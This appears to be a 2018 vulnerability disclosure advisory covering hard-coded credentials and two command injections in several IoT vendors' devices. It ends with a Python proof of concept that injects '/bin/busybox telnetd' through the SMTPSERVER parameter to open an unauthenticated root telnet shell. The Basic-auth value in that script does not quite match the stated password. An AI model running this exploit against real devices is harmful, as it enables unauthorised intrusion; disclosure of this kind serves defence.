SSD Advisory – Multiple IoT Vendors – Multiple Vulnerabilities
Credit to Author: SSD / Maor Schwartz| Date: Thu, 08 Feb 2018 08:02:43 +0000
Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom
See our full scope at: https://blogs.securiteam.com/index.php/product_scope
Vulnerabilities summary
The following advisory describes three (3) vulnerabilities found in the following vendors:
- Lorex
- StarVedia
- Eminent
- Kraun
The vulnerabilities found:
- Hard-coded credentials
- Remote command injection (2)
It is possible to chain the vulnerabilities and to achieve unauthenticated remote command execution.
Credit
An independent security researcher, Robert Kugler (https://www.s3cur3.it), has reported this vulnerabilities to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
We tried to contact Lorex, Kraun and Eminent, attempts to establish contact went unanswered, therefore no details have been provided on a solution or a workaround.
StarVedia were informed of the vulnerabilities and released patches to address them – “These two issues were fixed before your contacting us”
Vulnerabilities details
Hard-coded credentials
Default users that can be used to log in in the router’s website is: “supervisor”, with the password “dangerous”
Remote command injection (1)
User controlled input is not sufficiently filtered and allows to an attacker to inject arbitrary commands by sending POST request to wlanset.cgi with malicious ‘SSID’ parameter.
Proof of Concept
Remote command injection (2)
User controlled input is not sufficiently filtered and allows to an attacker to inject arbitrary commands by sending POST request to smtpset.cgi with malicious ‘SMTPSERVER’ parameter.
Proof of Concept
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | #!/usr/bin/python import requests import os import time print “Unauthenticated Remote Code Execution” url = ‘http://VICTIM-IP/cgi-bin/smtpset.cgi’ # Adjust IP address payload = {‘UseUserDefined’: ‘1’,‘SMTPSERVER’:‘`/bin/busybox telnetd`’,‘SMTPPORT’:’25’,‘SMTPNAME’:”,‘SMTPPASSWD’:”,‘SMTPTEST’:‘SMTP+server+test’} headers = { “Authorization”: “Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==”, “Content-type”: “application/x-www-form-urlencoded”} r = requests.post(url, data=payload, headers=headers) time.sleep(5) print “nTry to connect to your target via telnet and use the user name root.” |